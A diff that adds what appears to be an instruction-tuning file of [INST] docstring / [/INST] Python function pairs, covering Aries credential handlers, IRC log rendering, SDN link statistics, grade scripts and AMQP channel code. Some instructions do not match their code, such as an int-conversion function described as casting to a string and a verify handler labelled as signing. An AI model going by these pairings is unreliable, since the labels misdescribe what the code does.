diff --git "a/MIXTRAL_DatosEntrenamiento.txt" "b/MIXTRAL_DatosEntrenamiento.txt"
new file mode 100644--- /dev/null
+++ "b/MIXTRAL_DatosEntrenamiento.txt"
@@ -0,0 +1,13675 @@
+[INST] Message handler logic for credential offers.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("CredentialHandler called with context %s", context)
+ assert isinstance(context.message, CredentialIssue)
+ self._logger.info(
+ "Received credential message: %s", context.message.serialize(as_string=True)
+ )
+ if not context.connection_ready:
+ raise HandlerException("No connection established for credential issue")
+ credential_manager = CredentialManager(context.profile)
+ cred_ex_record = await credential_manager.receive_credential(
+ context.message, context.connection_record.connection_id
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="CredentialIssueHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if context.settings.get("debug.auto_store_credential"):
+ try:
+ cred_ex_record = await credential_manager.store_credential(
+ cred_ex_record
+ )
+ except (CredentialManagerError, IndyHolderError, StorageError) as err:
+ self._logger.exception(err)
+ credential_ack_message = await credential_manager.send_credential_ack(
+ cred_ex_record
+ )
+ trace_event(
+ context.settings,
+ credential_ack_message,
+ outcome="CredentialIssueHandler.handle.STORE",
+ perf_counter=r_time,
+ )
+[INST] Message handler logic for Aries#0037 v1.0 presentation requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("PresentationRequestHandler called with context %s", context)
+ assert isinstance(context.message, PresentationRequest)
+ self._logger.info(
+ "Received presentation request message: %s",
+ context.message.serialize(as_string=True),
+ )
+ if not context.connection_ready:
+ raise HandlerException("No connection established for presentation request")
+ presentation_manager = PresentationManager(context.profile)
+ indy_proof_request = context.message.indy_proof_request(0)
+ try:
+ async with context.session() as session:
+ (
+ presentation_exchange_record
+ ) = await V10PresentationExchange.retrieve_by_tag_filter(
+ session,
+ {"thread_id": context.message._thread_id},
+ {"connection_id": context.connection_record.connection_id},
+ )
+ except StorageNotFoundError:
+ presentation_exchange_record = V10PresentationExchange(
+ connection_id=context.connection_record.connection_id,
+ thread_id=context.message._thread_id,
+ initiator=V10PresentationExchange.INITIATOR_EXTERNAL,
+ role=V10PresentationExchange.ROLE_PROVER,
+ presentation_request=indy_proof_request,
+ presentation_request_dict=context.message.serialize(),
+ auto_present=context.settings.get(
+ "debug.auto_respond_presentation_request"
+ ),
+ trace=(context.message._trace is not None),
+ )
+ presentation_exchange_record.presentation_request = indy_proof_request
+ presentation_exchange_record = await presentation_manager.receive_request(
+ presentation_exchange_record
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="PresentationRequestHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if presentation_exchange_record.auto_present:
+ presentation_preview = None
+ if presentation_exchange_record.presentation_proposal_dict:
+ exchange_pres_proposal = PresentationProposal.deserialize(
+ presentation_exchange_record.presentation_proposal_dict
+ )
+ presentation_preview = exchange_pres_proposal.presentation_proposal
+ try:
+ req_creds = await indy_proof_req_preview2indy_requested_creds(
+ indy_proof_request,
+ presentation_preview,
+ holder=context.inject(IndyHolder),
+ )
+ except ValueError as err:
+ self._logger.warning(f"{err}")
+ return
+ presentation_message = None
+ try:
+ (
+ presentation_exchange_record,
+ presentation_message,
+ ) = await presentation_manager.create_presentation(
+ presentation_exchange_record=presentation_exchange_record,
+ requested_credentials=req_creds,
+ comment="auto-presented for proof request nonce={}".format(
+ indy_proof_request["nonce"]
+ ),
+ )
+ await responder.send_reply(presentation_message)
+ except (
+ IndyHolderError,
+ LedgerError,
+ PresentationManagerError,
+ WalletNotFoundError,
+ ) as err:
+ self._logger.exception(err)
+ if presentation_exchange_record:
+ await presentation_exchange_record.save_error_state(
+ context.session(),
+ reason=err.message,
+ )
+ except StorageError as err:
+ self._logger.exception(err)
+ trace_event(
+ context.settings,
+ presentation_message,
+ outcome="PresentationRequestHandler.handle.PRESENT",
+ perf_counter=r_time,
+ )
+[INST] Message handler logic for presentations.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("PresentationHandler called with context %s", context)
+ assert isinstance(context.message, Presentation)
+ self._logger.info(
+ "Received presentation message: %s",
+ context.message.serialize(as_string=True),
+ )
+ presentation_manager = PresentationManager(context.profile)
+ presentation_exchange_record = await presentation_manager.receive_presentation(
+ context.message, context.connection_record
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="PresentationHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if context.settings.get("debug.auto_verify_presentation"):
+ try:
+ await presentation_manager.verify_presentation(
+ presentation_exchange_record
+ )
+ except LedgerError as err:
+ self._logger.exception(err)
+ if presentation_exchange_record:
+ await presentation_exchange_record.save_error_state(
+ context.session(),
+ reason=err.message,
+ )
+ except StorageError as err:
+ self._logger.exception(err)
+ trace_event(
+ context.settings,
+ presentation_exchange_record,
+ outcome="PresentationHandler.handle.VERIFY",
+ perf_counter=r_time,
+ )
+[INST] Message handler logic for presentation proposals.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("V20PresProposalHandler called with context %s", context)
+ assert isinstance(context.message, V20PresProposal)
+ self._logger.info(
+ "Received v2.0 presentation proposal message: %s",
+ context.message.serialize(as_string=True),
+ )
+ if not context.connection_ready:
+ raise HandlerException(
+ "No connection established for presentation proposal"
+ )
+ pres_manager = V20PresManager(context.profile)
+ pres_ex_record = await pres_manager.receive_pres_proposal(
+ context.message, context.connection_record
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="V20PresProposalHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if context.settings.get("debug.auto_respond_presentation_proposal"):
+ pres_request_message = None
+ try:
+ (
+ pres_ex_record,
+ pres_request_message,
+ ) = await pres_manager.create_bound_request(
+ pres_ex_record=pres_ex_record,
+ comment=context.message.comment,
+ )
+ await responder.send_reply(pres_request_message)
+ except LedgerError as err:
+ self._logger.exception(err)
+ if pres_ex_record:
+ await pres_ex_record.save_error_state(
+ context.session(),
+ state=V20PresExRecord.STATE_ABANDONED,
+ reason=err.message,
+ )
+ except StorageError as err:
+ self._logger.exception(err)
+ trace_event(
+ context.settings,
+ pres_request_message,
+ outcome="V20PresProposalHandler.handle.PRESENT",
+ perf_counter=r_time,
+ )
+[INST] Request handler for signing a jsonld doc.. [/INST] async def verify(request: web.BaseRequest):
+ response = {"valid": False}
+ try:
+ context: AdminRequestContext = request["context"]
+ profile = context.profile
+ body = await request.json()
+ verkey = body.get("verkey")
+ doc = body.get("doc")
+ async with context.session() as session:
+ if verkey is None:
+ resolver = session.inject(DIDResolver)
+ ver_meth_expanded = await resolver.dereference(
+ profile, doc["proof"]["verificationMethod"]
+ )
+ if ver_meth_expanded is None:
+ raise MissingVerificationMethodError(
+ f"Verification method "
+ f"{doc['proof']['verificationMethod']} not found."
+ )
+ if not isinstance(ver_meth_expanded, VerificationMethod):
+ raise InvalidVerificationMethod(
+ "verificationMethod does not identify a valid verification method"
+ )
+ verkey = ver_meth_expanded.material
+ valid = await verify_credential(session, doc, verkey)
+ response["valid"] = valid
+ except (
+ BaseJSONLDMessagingError,
+ ResolverError,
+ ) as error:
+ response["error"] = str(error)
+ except (WalletError, InjectionError):
+ raise web.HTTPForbidden(reason="No wallet available")
+ return web.json_response(response)
+[INST] Message handler logic for v2.0 presentation requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("V20PresRequestHandler called with context %s", context)
+ assert isinstance(context.message, V20PresRequest)
+ self._logger.info(
+ "Received v2.0 presentation request message: %s",
+ context.message.serialize(as_string=True),
+ )
+ if not context.connection_ready:
+ raise HandlerException("No connection established for presentation request")
+ pres_manager = V20PresManager(context.profile)
+ try:
+ async with context.session() as session:
+ pres_ex_record = await V20PresExRecord.retrieve_by_tag_filter(
+ session,
+ {"thread_id": context.message._thread_id},
+ {"connection_id": context.connection_record.connection_id},
+ )
+ pres_ex_record.pres_request = context.message.serialize()
+ except StorageNotFoundError:
+ pres_ex_record = V20PresExRecord(
+ connection_id=context.connection_record.connection_id,
+ thread_id=context.message._thread_id,
+ initiator=V20PresExRecord.INITIATOR_EXTERNAL,
+ role=V20PresExRecord.ROLE_PROVER,
+ pres_request=context.message.serialize(),
+ auto_present=context.settings.get(
+ "debug.auto_respond_presentation_request"
+ ),
+ trace=(context.message._trace is not None),
+ )
+ pres_ex_record = await pres_manager.receive_pres_request(
+ pres_ex_record
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="V20PresRequestHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if pres_ex_record.auto_present:
+ indy_proof_request = context.message.attachment(V20PresFormat.Format.INDY)
+ try:
+ req_creds = await indy_proof_req_preview2indy_requested_creds(
+ indy_proof_request,
+ preview=None,
+ holder=context.inject(IndyHolder),
+ )
+ except ValueError as err:
+ self._logger.warning(f"{err}")
+ return
+ pres_message = None
+ try:
+ (pres_ex_record, pres_message) = await pres_manager.create_pres(
+ pres_ex_record=pres_ex_record,
+ requested_credentials=req_creds,
+ comment=(
+ "auto-presented for proof request nonce "
+ f"{indy_proof_request['nonce']}"
+ ),
+ )
+ await responder.send_reply(pres_message)
+ except (
+ IndyHolderError,
+ LedgerError,
+ V20PresManagerError,
+ WalletNotFoundError,
+ ) as err:
+ self._logger.exception(err)
+ if pres_ex_record:
+ await pres_ex_record.save_error_state(
+ context.session(),
+ state=V20PresExRecord.STATE_ABANDONED,
+ reason=err.message,
+ )
+ except StorageError as err:
+ self._logger.exception(err)
+ trace_event(
+ context.settings,
+ pres_message,
+ outcome="V20PresRequestHandler.handle.PRESENT",
+ perf_counter=r_time,
+ )
+[INST] Message handler logic for presentation proposals.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug(
+ "PresentationProposalHandler called with context %s", context
+ )
+ assert isinstance(context.message, PresentationProposal)
+ self._logger.info(
+ "Received presentation proposal message: %s",
+ context.message.serialize(as_string=True),
+ )
+ if not context.connection_ready:
+ raise HandlerException(
+ "No connection established for presentation proposal"
+ )
+ presentation_manager = PresentationManager(context.profile)
+ presentation_exchange_record = await presentation_manager.receive_proposal(
+ context.message, context.connection_record
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="PresentationProposalHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if context.settings.get("debug.auto_respond_presentation_proposal"):
+ presentation_request_message = None
+ try:
+ (
+ presentation_exchange_record,
+ presentation_request_message,
+ ) = await presentation_manager.create_bound_request(
+ presentation_exchange_record=presentation_exchange_record,
+ comment=context.message.comment,
+ )
+ await responder.send_reply(presentation_request_message)
+ except LedgerError as err:
+ self._logger.exception(err)
+ if presentation_exchange_record:
+ await presentation_exchange_record.save_error_state(
+ context.session(),
+ reason=err.message,
+ )
+ except StorageError as err:
+ self._logger.exception(err)
+ trace_event(
+ context.settings,
+ presentation_request_message,
+ outcome="PresentationProposalHandler.handle.PRESENT",
+ perf_counter=r_time,
+ )
+[INST] Message handler logic for credential requests.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("V20CredRequestHandler called with context %s", context)
+ assert isinstance(context.message, V20CredRequest)
+ self._logger.info(
+ "Received v2.0 credential request message: %s",
+ context.message.serialize(as_string=True),
+ )
+ if not context.connection_ready:
+ raise HandlerException("No connection established for credential request")
+ cred_manager = V20CredManager(context.profile)
+ cred_ex_record = await cred_manager.receive_request(
+ context.message, context.connection_record.connection_id
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="V20CredRequestHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if cred_ex_record.auto_issue:
+ cred_issue_message = None
+ try:
+ (
+ cred_ex_record,
+ cred_issue_message,
+ ) = await cred_manager.issue_credential(
+ cred_ex_record=cred_ex_record,
+ comment=context.message.comment,
+ )
+ await responder.send_reply(cred_issue_message)
+ except (V20CredManagerError, IndyIssuerError, LedgerError) as err:
+ self._logger.exception(err)
+ except StorageError as err:
+ self._logger.exception(err)
+ trace_event(
+ context.settings,
+ cred_issue_message,
+ outcome="V20CredRequestHandler.issue.END",
+ perf_counter=r_time,
+ )
+[INST] Message handler logic for credential proposals.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("V20CredProposalHandler called with context %s", context)
+ assert isinstance(context.message, V20CredProposal)
+ self._logger.info(
+ "Received v2.0 credential proposal message: %s",
+ context.message.serialize(as_string=True),
+ )
+ if not context.connection_ready:
+ raise HandlerException("No connection established for credential proposal")
+ cred_manager = V20CredManager(context.profile)
+ cred_ex_record = await cred_manager.receive_proposal(
+ context.message, context.connection_record.connection_id
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="CredentialProposalHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if cred_ex_record.auto_offer:
+ cred_offer_message = None
+ try:
+ (cred_ex_record, cred_offer_message) = await cred_manager.create_offer(
+ cred_ex_record,
+ counter_proposal=None,
+ comment=context.message.comment,
+ )
+ await responder.send_reply(cred_offer_message)
+ except (V20CredManagerError, IndyIssuerError, LedgerError) as err:
+ self._logger.exception(err)
+ if cred_ex_record:
+ await cred_ex_record.save_error_state(
+ context.session(),
+ reason=err.message,
+ )
+ except StorageError as err:
+ self._logger.exception(err)
+ trace_event(
+ context.settings,
+ cred_offer_message,
+ outcome="V20CredProposalHandler.handle.OFFER",
+ perf_counter=r_time,
+ )
+[INST] Message handler logic for credential offers.. [/INST] async def handle(self, context: RequestContext, responder: BaseResponder):
+ r_time = get_timer()
+ self._logger.debug("V20CredIssueHandler called with context %s", context)
+ assert isinstance(context.message, V20CredIssue)
+ self._logger.info(
+ "Received v2.0 credential issue message: %s",
+ context.message.serialize(as_string=True),
+ )
+ if not context.connection_ready:
+ raise HandlerException("No connection established for credential issue")
+ cred_manager = V20CredManager(context.profile)
+ cred_ex_record = await cred_manager.receive_credential(
+ context.message, context.connection_record.connection_id
+ )
+ r_time = trace_event(
+ context.settings,
+ context.message,
+ outcome="V20CredIssueHandler.handle.END",
+ perf_counter=r_time,
+ )
+ if context.settings.get("debug.auto_store_credential"):
+ try:
+ cred_ex_record = await cred_manager.store_credential(cred_ex_record)
+ except (V20CredManagerError, IndyHolderError, StorageError) as err:
+ self._logger.exception(err)
+ cred_ack_message = await cred_manager.send_cred_ack(cred_ex_record)
+ trace_event(
+ context.settings,
+ cred_ack_message,
+ outcome="V20CredIssueHandler.handle.STORE",
+ perf_counter=r_time,
+ )
+[INST] Try to cast an int to a string. If you can't, return the fallback value. [/INST] def to_int(s, fallback=0):
+ try:
+ result = int(s)
+ except ValueError:
+ result = fallback
+ except TypeError:
+ result = fallback
+ return result
+[INST] Creates migrations for the following account use cases:
+move an account
+- when the remote parent ou exists - ACCOUNT_MOVE
+- when the remote parent ou does not exist - ACCOUNT_MOVE_WITH_NON_EXISTENT_PARENT_OU. [/INST] def make_migrations_for_accounts(organizations, root_id: str) -> None:
+ accounts = get_accounts_folders()
+ for account_file_path in accounts:
+ account_name = account_file_path.split(SEP)[-1]
+ account_details = yaml.safe_load(
+ open(f"{account_file_path}{SEP}{META_FILE_NAME}", "r").read()
+ )
+ list_parents_single_page_response = organizations.list_parents_single_page(
+ ChildId=account_details.get("Id")
+ ).get("Parents")
+ if len(list_parents_single_page_response) != 1:
+ raise Exception(
+ f"{account_details.get('Id')} has {len(list_parents_single_page_response)} parents."
+ )
+ remote_parent_organizational_unit_ou_id = list_parents_single_page_response[
+ 0
+ ].get("Id")
+ parent_ou_path_details_file_path = SEP.join(
+ account_file_path.split(SEP)[0:-2] + [META_FILE_NAME]
+ )
+ if os.path.exists(parent_ou_path_details_file_path):
+ local_parent_ou_details = yaml.safe_load(
+ open(parent_ou_path_details_file_path, "r").read()
+ )
+ local_parent_organizational_unit_ou_id = local_parent_ou_details.get("Id")
+ if (
+ local_parent_organizational_unit_ou_id
+ != remote_parent_organizational_unit_ou_id
+ ):
+ write_migration(
+ EXTENSION,
+ root_id,
+ migrations.ACCOUNT_MOVE,
+ dict(
+ account_id=account_details.get("Id"),
+ source_parent_id=remote_parent_organizational_unit_ou_id,
+ destination_parent_id=local_parent_organizational_unit_ou_id,
+ ),
+ )
+ else:
+ destination_path = SEP.join(
+ [""] + parent_ou_path_details_file_path.split(SEP)[3:-1]
+ ).replace(f"{SEP}_organizational_units", "")
+ write_migration(
+ EXTENSION,
+ root_id,
+ migrations.ACCOUNT_MOVE_WITH_NON_EXISTENT_PARENT_OU,
+ dict(
+ account_id=account_details.get("Id"),
+ source_parent_id=remote_parent_organizational_unit_ou_id,
+ destination_path=destination_path,
+ ),
+ )
+[INST] Take an iterable list of log events and yield human-readable text strings. [/INST] def render_buffer(self, lines):
+ for line in lines:
+ try:
+ yield self.render_line(line.body)
+ except KeyError:
+ self.log.exception("Rendering exception")
+[INST] Render a single log event to a string.. [/INST] def render_line(self, line):
+ time = eid_to_datetime(line['eid'], self.tz)
+ msg = "[%s] " % (time.strftime('%Y-%m-%d %H:%M:%S'))
+ if line['type'] == 'buffer_msg':
+ msg += "<%s> %s" % (line.get('from', line.get('server')), line['msg'])
+ return msg
+ if line['type'] == 'buffer_me_msg':
+ msg += "— %s %s" % (line['from'], line['msg'])
+ return msg
+ if line['type'] in ['joined_channel', 'you_joined_channel']:
+ msg += '→ '
+ elif line['type'] in ['parted_channel', 'you_parted_channel']:
+ msg += '← '
+ elif line['type'] == 'quit':
+ msg += '⇐ '
+ else:
+ msg += '* '
+ if line['type'] in VERBATIM:
+ try:
+ msg += line['msg']
+ except KeyError:
+ self.log.warn("Log type %s has no attribute 'msg'", line['type'])
+ elif line['type'] in MESSAGES:
+ temp = Template(MESSAGES[line['type']])
+ msg += temp.safe_substitute(defaultdict(lambda: '', line))
+ elif line['type'] in STATS:
+ if 'parts' in line:
+ msg += line['parts'] + ": "
+ msg += line['msg']
+ elif line['type'] == 'user_channel_mode':
+ msg += '%s set %s %s' % (line.get('from', line.get('server')), line['diff'], line['nick'])
+ elif line['type'] == 'channel_query':
+ if line['query_type'] == 'timestamp':
+ msg += 'channel timestamp is %s' % line['timestamp']
+ elif line['query_type'] == 'mode':
+ msg += 'channel mode is %s' % line['newmode']
+ else:
+ self.log.warn('Unknown channel_query type: %s', line['query_type'])
+ elif line['type'] == 'channel_mode':
+ msg += 'Channel mode set to %s by ' % line['diff']
+ if 'from' in line:
+ msg += line['from']
+ else:
+ msg += 'the server %s' % line['server']
+ elif line['type'] == 'motd_response':
+ msg += "\n".join(line['lines'])
+ elif line['type'] in ['cap_ls', 'cap_req', 'cap_ack']:
+ if line['type'] == 'cap_ls':
+ msg += 'Available'
+ if line['type'] == 'cap_req':
+ msg += 'Requested'
+ if line['type'] == 'cap_ack':
+ msg += 'Acknowledged'
+ msg += ' capabilities: %s' % ' | '.join(line['caps'])
+ elif line['type'] == 'unknown_umode':
+ if 'flag' in line:
+ msg += line['flag'] + " "
+ msg += line['msg']
+ elif line['type'] == 'time':
+ msg += 'Server time: %s' % line['time_string']
+ if 'time_stamp' in line:
+ msg += ' (%s)' % line['time_stamp']
+ msg += ' - %s' % line['time_server']
+ else:
+ if 'msg' in line:
+ msg += line['msg']
+ self.log.warn('Unknown message type (%s)', line['type'])
+ return msg
+[INST] In packet_in handler, we need to learn access_table by ARP.
+Therefore, the first packet from UNKOWN host MUST be ARP.. [/INST] def _packet_in_handler(self, ev):
+ msg = ev.msg
+ datapath = msg.datapath
+ in_port = msg.match['in_port']
+ pkt = packet.Packet(msg.data)
+ arp_pkt = pkt.get_protocol(arp.arp)
+ ip_pkt = pkt.get_protocol(ipv4.ipv4)
+ if isinstance(arp_pkt, arp.arp):
+ self.logger.debug("ARP processing")
+ self.arp_forwarding(msg, arp_pkt.src_ip, arp_pkt.dst_ip)
+ arp_src_ip = arp_pkt.src_ip
+ arp_dst_ip = arp_pkt.dst_ip
+ mac = arp_pkt.src_mac
+ self.awareness.register_access_info(datapath.id, in_port, arp_src_ip, mac)
+ if isinstance(ip_pkt, ipv4.ipv4):
+ self.logger.debug("IPV4 processing")
+ if len(pkt.get_protocols(ethernet.ethernet)):
+ eth_type = pkt.get_protocols(ethernet.ethernet)[0].ethertype
+ self.shortest_forwarding(msg, eth_type, ip_pkt.src, ip_pkt.dst)
+[INST] Prints the all collected info for each of the links in the
+graph/topology. [/INST] def show_all_collected_info(self):
+ self.logger.info("\nsrc dst bandwidth packet_rate error")
+ self.logger.info("------------------------------------------------------------------------------")
+ for src in self.graph:
+ for dst in self.graph[src]:
+ bandwidth = -1
+ error = -1
+ packet_rate = -1
+ if 'bandwidth' in self.graph[src][dst]:
+ bandwidth = self.graph[src][dst]['bandwidth']
+ if 'packet_rate' in self.graph[src][dst]:
+ packet_rate = self.graph[src][dst]['packet_rate']
+ if 'error' in self.graph[src][dst]:
+ error = self.graph[src][dst]['error']
+ if packet_rate is -1 and error is -1 and bandwidth is -1:
+ continue
+ else:
+ self.awareness.is_ready = True
+ self.logger.info("%s<-->%s : %d %d %d" % (src, dst, bandwidth, packet_rate, error))
+[INST] Prints the bandwith for each of the links in the
+graph/topology. [/INST] def show_bandwidth(self):
+ self.logger.info("\nsrc dst bandwidth")
+ self.logger.info("---------------------------")
+ for src in self.graph:
+ for dst in self.graph[src]:
+ if 'bandwidth' in self.graph[src][dst]:
+ bandwidth = self.graph[src][dst]['bandwidth']
+ self.logger.info("%s<-->%s : %s" % (src, dst, bandwidth))
+ else:
+ continue
+[INST] Prints the packet rate for each of the links in the
+graph/topology. [/INST] def show_packet_rate(self):
+ self.logger.info("\nsrc dst packet_rate")
+ self.logger.info("---------------------------")
+ for src in self.graph:
+ for dst in self.graph[src]:
+ if 'packet_rate' in self.graph[src][dst]:
+ packet_rate = self.graph[src][dst]['packet_rate']
+ self.logger.info("%s<-->%s : %s" % (src, dst, packet_rate))
+ else:
+ continue
+[INST] Prints the errors for each of the links in the
+graph/topology. [/INST] def show_errors(self):
+ self.logger.info("\nsrc dst errors")
+ self.logger.info("---------------------------")
+ for src in self.graph:
+ for dst in self.graph[src]:
+ if 'error' in self.graph[src][dst]:
+ packet_rate = self.graph[src][dst]['error']
+ self.logger.info("%s<-->%s : %s" % (src, dst, packet_rate))
+ else:
+ continue
+[INST] Using a if else to find students grade. [/INST] def calcLetterGrade(self):
+ if self.percent < 60:
+ letter = 'F'
+ elif self.percent < 70:
+ letter = 'D'
+ elif self.percent < 80:
+ letter = 'C'
+ elif self.percent < 90:
+ letter = 'B'
+ else:
+ letter = 'A'
+ self.letterGrade = letter
+[INST] Checking what the user choose for the option with a if statment. [/INST] def checkGrades():
+ fileContents = getFileAsString('exam_grades.csv')
+ enter_choice = getChoice()
+ if enter_choice == 1:
+ print('The lowest grade is ' , min(fileContents))
+ elif enter_choice == 2:
+ print('The highest grade is ' , max(fileContents))
+ elif enter_choice == 3:
+ avg_sum = 0
+ for score in fileContents:
+ avg_sum += int(score)
+ avg = avg_sum/len(fileContents)
+ print('The average grade is ' , avg )
+ elif enter_choice == 4:
+ user = int(input('Enter a number to search for: '))
+ if (user in fileContents):
+ print('The grade',user, 'was present')
+ else:
+ print('The grade' ,user, 'was not present')
+[INST] Funcation that returns a dictionary that goes through a file. [/INST] def createStudentDictionary():
+ studentDict={}
+ f = open('class_roster.txt')
+ line = f.readline()
+ studentDict = {}
+ while line:
+ first_name,last_name,student_id,year = line.split(',')
+ student_year = year.strip(' \n ')
+ student_tup = (first_name, last_name, student_year); studentDict.update({student_id: student_tup})
+ line = f.readline()
+ f.close()
+ return studentDict
+[INST] Funcation that formats the dictionary above. [/INST] def studentSearch(dictionary, studentID):
+ try:
+ combining = dictionary[studentID]
+ total = "First Name: {} \nLast Name: {} \nSchool Year: {} ".format(combining[0], combining[1], combining[2])
+ return total
+ except KeyError:
+ errorsum = 'No student found with ID ' + studentID + '.\n'
+ return errorsum
+[INST] Convert an object to a type that is fairly generally serializable .
+This only handles the cases that need converting. The json module handles all the rest.. [/INST] def convert_serializable_special_cases(o):
+ if isinstance(o, Enum):
+ serializable_representation = o.name
+ elif isinstance(o, Decimal):
+ try:
+ is_int = o % 1 == 0
+ except decimal.InvalidOperation:
+ is_int = False
+ if is_int:
+ serializable_representation = int(o)
+ else:
+ serializable_representation = float(o)
+ elif isinstance(o, bytes) or isinstance(o, bytearray):
+ serializable_representation = str(o)
+ elif hasattr(o, "value"):
+ serializable_representation = str(o.value)
+ else:
+ serializable_representation = str(o)
+ return serializable_representation
+[INST] Structured formatter helper function. When called with any number of positional or keyword arguments, creates a structured string representing those arguments.
+This is a short function name (sf) since it usually goes inside a logging call.
+
+Example code:
+question = "life"
+answer = 42
+log.info(sf("test structured logging", question=question, answer=answer)). [/INST] def sf(*args, **kwargs):
+ separator = ","
+ output_list = []
+ if len(args) > 0:
+ output_list.append(separator.join(args))
+ if len(kwargs) > 0:
+ output_list.extend([structured_sentinel, json.dumps(kwargs, default=convert_serializable_special_cases), structured_sentinel])
+ return " ".join(output_list)
+[INST] Construct a tree with
+depth nvar,
+totol order pt,
+interaction jt: number of nonzero term. [/INST] def tree_building(tree, nvar, pt, jt):
+ if nvar == 1 and (jt != 0 or pt == 0):
+ nn = Node(pt)
+ tree.add_child(nn)
+ else:
+ for ii in range(pt+1):
+ next_pt = pt - ii
+ if ii == 0:
+ next_jt = jt
+ else:
+ next_jt = jt - 1
+ if next_jt <= nvar - 1 \
+ and next_jt <= next_pt \
+ and (next_jt > 0 or (next_jt == 0 and next_pt == 0)):
+ nn = Node(ii)
+ tree.add_child(nn)
+ tree_building(nn, nvar-1, next_pt, next_jt)
+ else:
+ pass
+[INST] return the Total Combination with
+nvar: number of variable
+order: total order
+qnorm : qnorm constraint. [/INST] def total_combination(nvar, order, jtmax=np.inf, qnorm=1):
+ order_list = []
+ for sum_order in range(order + 1):
+ for jt in range(min(sum_order+1, jtmax+1)):
+ order_list += single_combination(nvar, sum_order, jt, order, qnorm)
+ return order_list
+[INST] build large X, Y for linear regression. [/INST] def build_xy(order_list, poly, x, y, xdev=[], dydx=[]):
+ X = expand_x(order_list, x, poly)
+ Y = np.array(y).flatten()
+ if len(xdev) != 0:
+ Xdev = expand_dev_xy(order_list, xdev, poly)
+ Dydx = np.array(dydx).flatten()
+ X = np.vstack((X, Xdev))
+ Y = np.append(Y, Dydx)
+ return X, Y
+[INST] Turns human given string to time in minutes
+e.g.. [/INST] def time_to_min(in_time: str) -> int:
+ times = [int(x.strip()) for x in in_time.strip("m").split("h")]
+ assert len(times) <= 2
+ if len(times) == 1:
+ return times[0]
+ else:
+ return times[0] * 60 + times[1]
+[INST] Main scoring function that calculates the winnings. [/INST] def score(times: list, pot: int, power: int = 0.1) -> list:
+ power_times = [x ** power for x in times]
+ max_time, min_time = max(power_times), min(power_times)
+ scores = [max_time - x for x in power_times]
+ return [round(float(x) / sum(scores) * pot, 2) for x in scores]
+[INST] Execute the RPC command for the frame.. [/INST] def _rpc(self, frame_value):
+ LOGGER.debug('Issuing RPC to RabbitMQ: %r', frame_value)
+ if self.channel.closed:
+ raise exceptions.ChannelClosedException()
+ return self.channel.rpc(frame_value)
+[INST] Write a frame to the channel's connection. [/INST] def _write_frame(self, frame_value):
+ self.channel.write_frame(frame_value)
+[INST] Set the state to the specified value, validating it is a supported
+state value.. [/INST] def _set_state(self, value):
+ if value not in list(self.STATES.keys()):
+ raise ValueError('Invalid state value: %r' % value)
+ LOGGER.debug('%s setting state to %r',
+ self.__class__.__name__, self.STATES[value])
+ self._state = value
+[INST] Returns True if in the CLOSED runtime state. [/INST] def closed(self):
+ return self._state == self.CLOSED
+[INST] Returns True if in the CLOSING runtime state. [/INST] def closing(self):
+ return self._state == self.CLOSING
+[INST] Returns True if in the OPEN runtime state. [/INST] def open(self):
+ return self._state == self.OPEN
+[INST] Returns True if in the OPENING runtime state. [/INST] def opening(self):
+ return self._state == self.OPENING
+[INST] Returns the text based description of the runtime state. [/INST] def state_description(self):
+ return self.STATES[self._state]
+[INST] Send a RPC command to the remote server. This should not be directly
+invoked.. [/INST] def rpc(self, frame_value):
+ if self.closed:
+ raise exceptions.ChannelClosedException()
+ if self._is_debugging:
+ LOGGER.debug('Sending %r', frame_value.name)
+ self.write_frame(frame_value)
+ if frame_value.synchronous:
+ return self._wait_on_frame(frame_value.valid_responses)
+[INST] Used by the Message.publish method when publisher confirmations are
+enabled.. [/INST] def wait_for_confirmation(self):
+ return self._wait_on_frame([specification.Basic.Ack,
+ specification.Basic.Nack])
+[INST] Put the frame in the write queue for the IOWriter object to write to
+the socket when it can. This should not be directly invoked.. [/INST] def write_frame(self, frame):
+ if self.closed:
+ return
+ self._check_for_exceptions()
+ if self._is_debugging:
+ LOGGER.debug('Writing frame: %s', frame.name)
+ with self._write_lock:
+ self._write_queue.put((self._channel_id, frame))
+ self._trigger_write()
+[INST] Add a list of frames for the IOWriter object to write to the socket
+when it can.. [/INST] def write_frames(self, frames):
+ if self.closed:
+ return
+ self._check_for_exceptions()
+ if self._is_debugging:
+ LOGGER.debug('Writing frames: %r', [frame.name for frame in frames])
+ with self._write_lock:
+ [self._write_queue.put((self._channel_id, frame))
+ for frame in frames]
+ self._trigger_write()
+[INST] Return the proper close frame for this object.. [/INST] def _build_close_frame(self):
+ return self.CLOSE_REQUEST_FRAME(self.DEFAULT_CLOSE_CODE,
+ self.DEFAULT_CLOSE_REASON)
+[INST] Check if there are any queued exceptions to raise, raising it if
+there is.. [/INST] def _check_for_exceptions(self):
+ if not self._exceptions.empty():
+ exception = self._exceptions.get()
+ self._exceptions.task_done()
